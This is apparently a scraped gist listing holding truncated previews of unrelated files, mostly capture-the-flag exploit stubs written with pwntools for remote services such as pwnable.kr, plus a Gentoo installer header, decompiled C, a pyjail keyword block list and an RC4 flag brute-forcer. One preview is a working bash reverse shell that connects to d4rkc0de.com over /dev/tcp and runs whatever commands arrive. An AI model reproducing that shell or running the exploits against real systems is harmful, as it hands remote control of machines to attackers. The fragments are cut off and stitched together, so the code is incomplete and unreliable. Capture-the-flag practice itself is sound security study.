This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
r = remote('jh2i.com', 50016) | |
#r = process('./saas') | |
def syscall(a2): | |
print ("syscall", a2) | |
for a in a2: | |
txt = r.recv(timeout=2).strip() | |
print (txt.strip(), len(txt)) | |
r.sendline(str(a)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
NAME="Gentoo Install" | |
CODENAME="gentooinstall" | |
COPYRIGHT="Copyright (C) 2016 Nathan Shearer" | |
LICENSE="GNU General Public License 2.0" | |
VERSION="2.0.0.0" | |
function gentooinstall_architecture | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
exec 5<>/dev/tcp/d4rkc0de.com/2334 | |
cat <&5 | while read line; do $line 2>&5 >&5; done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
state = {'a': 0, 'pc': 0x100} | |
mem = [] | |
blocked_addrs = [] | |
def parse_opcode(opcode, arg): | |
global state | |
global mem | |
global blocked_addrs | |
jumped = False | |
x = int(arg, base=16) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
import re | |
#r = process("/home/horcruxes/horcruxes") | |
r = remote('0.0.0.0', 9032) | |
print r.recvuntil("Select Menu:") | |
r.send("123\n") | |
print r.recvuntil("earned? : ") | |
a = p32(0x809fe4b) | |
b = p32(0x809fe6a) | |
c = p32(0x809fe89) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
#r = process('./dragon') | |
r = remote("pwnable.kr", 9004) | |
win = p32(0x08048dbf) | |
def select_priest(): | |
print r.recvuntil("[ 2 ] Knight") | |
r.send("1\n") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /usr/bin/python3 | |
#-*- coding:utf-8 -*- | |
def main(): | |
print("Hi! Welcome to pyjail!") | |
print("========================================================================") | |
print(open(__file__).read()) | |
print("========================================================================") | |
print("RUN") | |
text = input('>>> ') | |
for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
signed __int64 __fastcall make_request(const struct sockaddr *a1, socklen_t a2, char *a3, char *a4, void **a5, _QWORD *a6) | |
{ | |
int *v6; // rax | |
signed __int64 result; // rax | |
int *v8; // rax | |
size_t v9; // rax | |
int *v10; // rax | |
size_t v11; // rax | |
int *v12; // rax | |
int *v13; // rax |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
void *__fastcall fetch(void *url_1) | |
{ | |
int v1; // eax | |
char *v2; // rax | |
__int64 v3; // rdx | |
int *v4; // rax | |
void *dest; // ST78_8 | |
uint16_t port_network; // [rsp+1Ah] [rbp-116h] | |
int portnumber; // [rsp+1Ch] [rbp-114h] | |
char *hostname; // [rsp+20h] [rbp-110h] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from arc4 import ARC4 | |
data='\xef\x8eX7 CD\xcc\xfb!\x03@\xf5\x10\xf8 \x18\x986\xc09\xcf\x87/\xc2h\xd1\x94\xc6\x83\xfb;aG\xfat\n\xda^\x0f\xb8\xe1]d\xb6=\xd7\xa4\x0216:\x0f\xf8\xf6j\xdeN\xc3\xd5\x82z$^\xfa\xc0\xea\xab\x14\xf1qB\x80\x9c\xc5Z\xd5\xf8\xc0(H\\2\x17_\xa0\xef\xf4\x16q\x00\xbd\x17q\xfd\x10\xef\x17\xe6\xb6\x86\xea[\xb7:\x1c\x85\x8evJ!\x1a\x9d\x00\xefP\x9eml=\x13*g3\x7f\xc7\x97\xb4\xb6' | |
def decrypt(key): | |
arc4 = ARC4(key) | |
config = arc4.decrypt(data) | |
config = str(config) | |
if('flag' in config): | |
print(config, key) |